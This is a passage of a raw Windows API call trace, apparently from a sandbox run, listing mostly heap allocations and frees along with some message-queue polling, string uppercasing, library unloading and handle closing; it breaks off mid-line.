[0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0265.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.946] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0265.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.946] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0265.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0265.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.946] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0265.947] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0265.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.947] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.948] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.948] FreeLibrary (hLibModule=0x74d40000) returned 1 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.948] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.949] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.949] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.950] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0265.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0265.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.952] CloseHandle (hObject=0x2d0) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0265.953] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0265.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0265.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: 